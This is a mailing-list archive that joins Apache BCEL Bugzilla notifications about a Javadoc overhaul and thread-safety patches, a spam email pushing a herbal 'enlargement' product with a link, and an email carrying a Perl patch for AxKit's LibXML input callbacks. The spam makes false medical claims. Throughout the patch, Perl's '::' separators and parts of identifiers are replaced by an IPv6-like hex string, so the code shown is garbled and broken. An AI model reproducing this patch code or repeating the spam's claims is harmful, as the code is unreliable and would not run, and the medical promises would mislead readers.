NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=42402 ------- Additional Comments From [email protected] 2007-05-16 12:02 ------- TYPE_NAMES, CLASS_TYPE_NAMES, and SHORT_TYPE_NAMES (in org.apache.bcel.Constants) were missing entries for T_ADDRESS. Entries "address", ILLEGAL_TYPE, and ILLEGAL_TYPE (respectively) have been added to my copy. I should have a patch for Constants.java momentarily, I'm around 98% through the file. -Charlie -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed May 16 19:28:39 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14342 invoked from network); 16 May 2007 19:28:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 May 2007 19:28:38 -0000 Received: (qmail 93736 invoked by uid 500); 16 May 2007 19:28:44 -0000 Delivered-To: [email protected] Received: (qmail 93710 invoked by uid 500); 16 May 2007 19:28:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "BCEL Developers List" <bcel-dev.jakarta.apache.org> Reply-To: "BCEL Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 93699 invoked by uid 99); 16 May 2007 19:28:43 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 May 2007 12:28:43 -0700 X-ASF-Spam-Status: No, hits=-99.2 required=10.0 tests=ALL_TRUSTED,MAILTO_TO_SPAM_ADDR,NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 May 2007 12:28:36 -0700 Received: by brutus.apache.org (Postfix, from userid 33) id 0CEDF71406F; Wed, 16 May 2007 12:28:15 -0700 (PDT) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 42402] - Javadoc overhaul In-Reply-To: <[email protected]/bugzilla/> X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Wed, 16 May 2007 12:28:15 -0700 (PDT) X-Virus-Checked: Checked by ClamAV on apache.org DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=42402>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=42402 ------- Additional Comments From [email protected] 2007-05-16 12:28 ------- Created an attachment (id=20209) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=20209&action=view) SVN diff of trunk overhauling the javadoc comments. Ran into one more problem in Constants.java. There was a broken TODO (misspelled as TOFO) on ATTRIBUTE_NAMES, saying "FIXXXXX". The array looks fine to me, though using ATTR_UNKNOWN could be a problem, as it's got value -1. I fixed the TODO, added a warning to the Javadoc, and left a similar explanation to this one in the code. Anyway, here's the svn diff of trunk for Constants.java. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu May 17 01:07:24 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36687 invoked from network); 17 May 2007 01:07:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 May 2007 01:07:23 -0000 Received: (qmail 74443 invoked by uid 500); 17 May 2007 01:07:30 -0000 Delivered-To: [email protected] Received: (qmail 74323 invoked by uid 500); 17 May 2007 01:07:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "BCEL Developers List" <bcel-dev.jakarta.apache.org> Reply-To: "BCEL Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 74312 invoked by uid 99); 17 May 2007 01:07:29 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 May 2007 18:07:29 -0700 X-ASF-Spam-Status: No, hits=-99.2 required=10.0 tests=ALL_TRUSTED,MAILTO_TO_SPAM_ADDR,NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 May 2007 18:07:22 -0700 Received: by brutus.apache.org (Postfix, from userid 33) id 6D90B71406F; Wed, 16 May 2007 18:07:02 -0700 (PDT) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 42402] - Javadoc overhaul In-Reply-To: <[email protected]/bugzilla/> X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Wed, 16 May 2007 18:07:02 -0700 (PDT) X-Virus-Checked: Checked by ClamAV on apache.org DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=42402>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=42402 ------- Additional Comments From [email protected] 2007-05-16 18:07 ------- Waiting for feedback before I go onwards. Just to make sure I'm on the right track. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu May 31 00:56:22 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90740 invoked from network); 31 May 2007 00:56:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 May 2007 00:56:20 -0000 Received: (qmail 30936 invoked by uid 500); 31 May 2007 00:56:25 -0000 Delivered-To: [email protected] Received: (qmail 30816 invoked by uid 500); 31 May 2007 00:56:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "BCEL Developers List" <bcel-dev.jakarta.apache.org> Reply-To: "BCEL Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 30800 invoked by uid 99); 31 May 2007 00:56:24 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 30 May 2007 17:56:24 -0700 X-ASF-Spam-Status: No, hits=-99.5 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 30 May 2007 17:56:19 -0700 Received: by brutus.apache.org (Postfix, from userid 33) id 696E87141A7; Wed, 30 May 2007 17:55:58 -0700 (PDT) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 42552] New: - Thread safety + unbuffered writes Message-ID: <[email protected]/bugzilla/> X-Bugzilla-Reason: AssignedTo Date: Wed, 30 May 2007 17:55:58 -0700 (PDT) X-Virus-Checked: Checked by ClamAV on apache.org DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=42552>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=42552 Summary: Thread safety + unbuffered writes Product: BCEL Version: 5.2 Platform: Other OS/Version: other Status: NEW Severity: normal Priority: P2 Component: Main AssignedTo: [email protected] ReportedBy: [email protected] Here's a patch for 5.2 to fix all apparent remaining thread safety issues in BCEL plus a case where unbuffered writes were being done. The thread safety changes use thread locals in the spirit of an earlier partial patch. These changes have been used to eliminate the need to synchronize around BCEL while testing real-world applications using Xalan XSLTC on our platform. Ken McNeil Software Engineer Azul Systems, Inc. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu May 31 00:57:16 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9726 invoked from network); 31 May 2007 00:57:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 May 2007 00:57:14 -0000 Received: (qmail 31437 invoked by uid 500); 31 May 2007 00:57:19 -0000 Delivered-To: [email protected] Received: (qmail 31405 invoked by uid 500); 31 May 2007 00:57:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "BCEL Developers List" <bcel-dev.jakarta.apache.org> Reply-To: "BCEL Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 31394 invoked by uid 99); 31 May 2007 00:57:18 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 30 May 2007 17:57:18 -0700 X-ASF-Spam-Status: No, hits=-99.5 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 30 May 2007 17:57:14 -0700 Received: by brutus.apache.org (Postfix, from userid 33) id 338A17141A7; Wed, 30 May 2007 17:56:54 -0700 (PDT) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 42552] - Thread safety + unbuffered writes In-Reply-To: <[email protected]/bugzilla/> X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Wed, 30 May 2007 17:56:54 -0700 (PDT) X-Virus-Checked: Checked by ClamAV on apache.org DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=42552>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=42552 ------- Additional Comments From [email protected] 2007-05-30 17:56 ------- Created an attachment (id=20294) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=20294&action=view) Patch -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
From [email protected] Thu Jul 06 06:12:08 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52953 invoked from network); 6 Jul 2006 06:12:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jul 2006 06:12:07 -0000 Received: (qmail 6220 invoked by uid 500); 6 Jul 2006 06:12:07 -0000 Delivered-To: [email protected] Received: (qmail 6211 invoked by uid 99); 6 Jul 2006 06:12:07 -0000 Received-SPF: neutral (hermes.apache.org: local policy) Received: from [161.129.204.104] (HELO macos23.meta.lviv.ua) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 05 Jul 2006 23:12:07 -0700 Return-Path: <[email protected]> Received: from anumail7.anu.edu.au ([161.129.204.104] helo=anu.edu.au) by smtp0.sepck.nl with esmtp (banks 3.35 #1 (pregnant)) id 1A8nEM-0003Er-00 Date: Thu, 06 Jul 2006 05:02:42 -0200 Message-ID: <[email protected]> From: "Lillian Arredondo" <[email protected]> To: [email protected] Subject: Re: more X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Sensationall revoolution in medicine! E''nlarge your p''enis up to 10 cm or up to 4 inches! Its h'erbal solution what hasnt side effect, but has 100% guaranted results! Dont lose your chance and but know wihtout doubts, you will be impressed with results! Clisk here: http://harmswaybarandgrill.info weyerhauser uruguay betimes sandbag peltry centralize tumultuous refinery bedeck captor home-felt airborne ill-mannered appendix midnight sapiens From [email protected] Thu Jul 06 08:49:06 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25450 invoked from network); 6 Jul 2006 08:49:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jul 2006 08:49:06 -0000 Received: (qmail 31891 invoked by uid 500); 6 Jul 2006 08:49:06 -0000 Delivered-To: [email protected] Received: (qmail 31829 invoked by uid 500); 6 Jul 2006 08:49:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <axkit-dev.xml.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 31818 invoked by uid 99); 6 Jul 2006 08:49:05 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 06 Jul 2006 01:49:05 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO smtp.uibk.ac.at) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 06 Jul 2006 01:49:04 -0700 Received: from [161.129.204.104] ([161.129.204.104]) (authenticated bits=0) by smtp.uibk.ac.at (8.13.1/8.13.1/F1) with ESMTP id k668mcqS013647 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO); Thu, 6 Jul 2006 10:48:38 +0200 Message-ID: <[email protected]> Date: Thu, 06 Jul 2006 10:48:38 +0200 From: =?ISO-8859-1?Q?Michael_Kr=F6ll?= <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20060516) MIME-Version: 1.0 To: [email protected] CC: [email protected] Subject: Patches for upcoming XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML and XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXSLT releases X-Enigmail-Version: 161.129.204.104 Content-Type: multipart/mixed; boundary="------------030103080705090500020109" X-Spam-Score: -9.4 () ALL_TRUSTED,RCV_SMTP_AUTH,RCV_SMTP_UIBK X-Scanned-By: MIMEDefang [email protected] on 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multi-part message in MIME format. --------------030103080705090500020109 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, The input callback implementation of XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML and XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXSLT has changed in the respective CVS versions. The attached patch against current AxKit SVN will help to get AxKit work again with the CVS version of both LibX* modules. The release 1.59 of XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML and XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXSLT should not be too far away in time. - --michael - -- 063A F25E B064 A98F A479 1690 78CD D023 5E2A 6688 http://zis.uibk.ac.at/.m/uibk.ac.at_pgp_pubkey.asc -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) iD8DBQFErM5meM3QI14qZogRAmbZAJ9PxkV5qfWaWu37JBnrkECWTLWRIgCfQTaO DxOoXObepsKdRWQiuRKvCRw= =JuEd -----END PGP SIGNATURE----- --------------030103080705090500020109 Content-Type: text/plain; name="AxKitSVN-new_LibX_input_callback_implementation.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename*0="AxKitSVN-new_LibX_input_callback_implementation.patch" Index: lib/Apache/AxKit/Language/HtmlDoc.pm =================================================================== --- lib/Apache/AxKit/Language/HtmlDoc.pm (revision 419205) +++ lib/Apache/AxKit/Language/HtmlDoc.pm (working copy) @@ -25,7 +25,8 @@ use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bConstants qw(:common); use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest; use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLanguage; -use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLSupport; +use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML; +use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLCallbacks; use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bProvider; use XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXSLT; use IPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRun qw(run); @@ -40,16 +41,15 @@ my $class = shift; my ($r, $xml_provider, undef, $last_in_chain) = @_; - my $parser = XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML->new(); - local($XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bmatch_cb, $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bopen_cb, - $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bread_cb, $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blose_cb); - Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLSupport->reset(); + my $parser = Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML->new(); + $parser->expand_xinclude(1); my $dom; my $source_text; if ($dom = $r->pnotes('dom_tree')) { ; - } elsif ($source_text = $r->pnotes('xml_string')) { + } + elsif ($source_text = $r->pnotes('xml_string')) { $dom = $parser->parse_string($source_text, $r->uri()); } else { @@ -60,7 +60,6 @@ } $dom = $parser->parse_string($source_text, $r->uri()); } - $dom->process_xinclude(); my $style_dom = $parser->parse_string(<< 'EOX','.'); <?xml version="1.0"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml"> @@ -69,7 +68,9 @@ <xsl:template match="text()"><xsl:value-of select="."/></xsl:template> </xsl:stylesheet> EOX - my $stylesheet = XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXSLT->parse_stylesheet($style_dom); + my $xslt = XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXSLT->new(); + $xslt->input_callbacks( Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLCallbacks->input_callbacks() ); + $stylesheet = $xslt->parse_stylesheet($style_dom); my $results = $stylesheet->transform($dom); my $result; Index: lib/Apache/AxKit/Language/XSP.pm =================================================================== --- lib/Apache/AxKit/Language/XSP.pm (revision 419205) +++ lib/Apache/AxKit/Language/XSP.pm (working copy) @@ -19,6 +19,7 @@ use strict; use AxKit; +use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML; use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLanguage; use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest; use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bxception; @@ -1079,7 +1080,7 @@ package AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bXSPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bSAXParser; use XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML 1.30; -use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLSupport; +use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML; sub new { my ($type, %self) = @_; @@ -1092,11 +1093,9 @@ my $doc; if (ref($thing) ne 'XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bocument') { - my $parser = XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML->new(); - local($XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bmatch_cb, $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bopen_cb, - $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bread_cb, $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blose_cb); - Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLSupport->reset($parser); + my $parser = Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML->new(); $parser->expand_entities(1); + $parser->expand_xinclude(1); eval { $parser->line_numbers(1); AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(6,"enabled line numbers"); @@ -1108,9 +1107,9 @@ else { $doc = $parser->parse_string($thing); } - AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(10, 'XSP: Parser returned doc'); - $doc->process_xinclude; - } else { + AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(9, 'XSP: Parser returned doc'); + } + else { $doc = $thing; } Index: lib/Apache/AxKit/Language/LibXSLT.pm =================================================================== --- lib/Apache/AxKit/Language/LibXSLT.pm (revision 419205) +++ lib/Apache/AxKit/Language/LibXSLT.pm (working copy) @@ -25,7 +25,8 @@ use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest; use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLanguage; use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bProvider; -use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLSupport; +use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML; +use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLCallbacks; use Filacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bBasename qw(dirname); @ISA = 'Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLanguage'; @@ -62,11 +63,9 @@ $xmlstring = $r->pnotes('xml_string'); } - my $parser = XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML->new(); + my $parser = Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML->new(); $parser->expand_entities(1); - local($XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bmatch_cb, $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bopen_cb, - $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bread_cb, $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blose_cb); - Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLSupport->reset(); + $parser->expand_xinclude(1); local $Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLSupportacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bprovider_cb = sub { my $r = shift; @@ -82,8 +81,6 @@ $xml_doc = $parser->parse_string($xmlstring, $r->uri()); } - $xml_doc->process_xinclude(); - AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(7, "[LibXSLT] parsing stylesheet"); my $stylesheet; @@ -111,9 +108,8 @@ AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(7, "[LibXSLT] parsing stylesheet $style_uri"); my $style_doc = $style->get_dom(); - local($XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bmatch_cb, $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bopen_cb, - $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bread_cb, $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blose_cb); - Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLSupport->reset(); + my $xslt = XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXSLT->new(); + $xslt->input_callbacks( Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLCallbacks->input_callbacks() ); local $Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLSupportacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bprovider_cb = sub { my $r = shift; @@ -122,7 +118,7 @@ return $provider; }; - $stylesheet = XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXSLT->parse_stylesheet($style_doc); + $stylesheet = $xslt->parse_stylesheet($style_doc); unless ($r->dir_config('AxDisableXSLTStylesheetCache')) { $style_cache{$style->key()} = Index: lib/Apache/AxKit/LibXMLSupport.pm =================================================================== --- lib/Apache/AxKit/LibXMLSupport.pm (revision 419205) +++ lib/Apache/AxKit/LibXMLSupport.pm (working copy) @@ -1,81 +0,0 @@ -# Copyright 2001-2005 The Apache Software Foundation -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# - -# $Id$ - -package Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLSupport; -use strict; -use XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML 1.50; -use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bProvider; - -use vars qw($provider_cb); - -sub reset { - my $class = shift; - $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bmatch_cb = \&match_uri; - $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bread_cb = \&read_uri; - 